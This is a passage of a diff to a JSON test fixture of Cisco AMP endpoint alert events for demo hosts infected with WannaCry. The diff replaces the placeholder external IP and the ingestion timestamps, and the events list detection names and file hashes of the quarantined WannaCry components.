Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741855\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2741,7 +2741,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2795,7 +2795,7 @@ "e889544aff85ffaf8b0d0da705105dee7c97fe26" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2812,8 +2812,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103782670Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741857\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", + "ingested": "2021-12-09T13:35:51.461671200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741857\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2835,7 +2835,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2885,7 +2885,7 @@ "e889544aff85ffaf8b0d0da705105dee7c97fe26" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2898,8 +2898,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103784832Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":163000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", + "ingested": "2021-12-09T13:35:51.461675200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":163000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2921,7 +2921,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2962,7 +2962,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2972,8 +2972,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103786853Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":709000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:51.461679200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":709000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -2993,7 +2993,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3034,7 +3034,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3044,8 +3044,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103788884Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214492323807000,\"timestamp\":1610631810,\"timestamp_nanoseconds\":447000000,\"date\":\"2021-01-14T13:43:30+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461682700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214492323807000,\"timestamp\":1610631810,\"timestamp_nanoseconds\":447000000,\"date\":\"2021-01-14T13:43:30+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -3065,7 +3065,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3124,7 +3124,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3141,8 +3141,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103790885Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214488028840000,\"timestamp\":1610631809,\"timestamp_nanoseconds\":916000000,\"date\":\"2021-01-14T13:43:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", + "ingested": "2021-12-09T13:35:51.461687200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214488028840000,\"timestamp\":1610631809,\"timestamp_nanoseconds\":916000000,\"date\":\"2021-01-14T13:43:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3164,7 +3164,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3209,7 +3209,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3219,8 +3219,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:28.103792900Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945890085425,\"timestamp\":1610630976,\"timestamp_nanoseconds\":535214029,\"date\":\"2021-01-14T13:29:36+00:00\",\"event_type\":\"Potential Dropper Infection\",\"event_type_id\":1107296257,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610630976,\"start_date\":\"2021-01-14T13:29:36+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461693100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945890085425,\"timestamp\":1610630976,\"timestamp_nanoseconds\":535214029,\"date\":\"2021-01-14T13:29:36+00:00\",\"event_type\":\"Potential Dropper Infection\",\"event_type_id\":1107296257,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610630976,\"start_date\":\"2021-01-14T13:29:36+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1107296257", "kind": "alert", "start": "2021-01-14T13:29:36.000Z", @@ -3242,7 +3242,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3274,7 +3274,7 @@ "Demo_Qakbot_3" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3284,8 +3284,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:15:28.103794895Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412574627503014000,\"timestamp\":1610630889,\"timestamp_nanoseconds\":341000000,\"date\":\"2021-01-14T13:28:09+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "ingested": "2021-12-09T13:35:51.461698100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412574627503014000,\"timestamp\":1610630889,\"timestamp_nanoseconds\":341000000,\"date\":\"2021-01-14T13:28:09+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", "action": "Policy Update", @@ -3302,7 +3302,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -3338,7 +3338,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3348,8 +3348,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103796929Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":50000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461703800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":50000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Quarantine 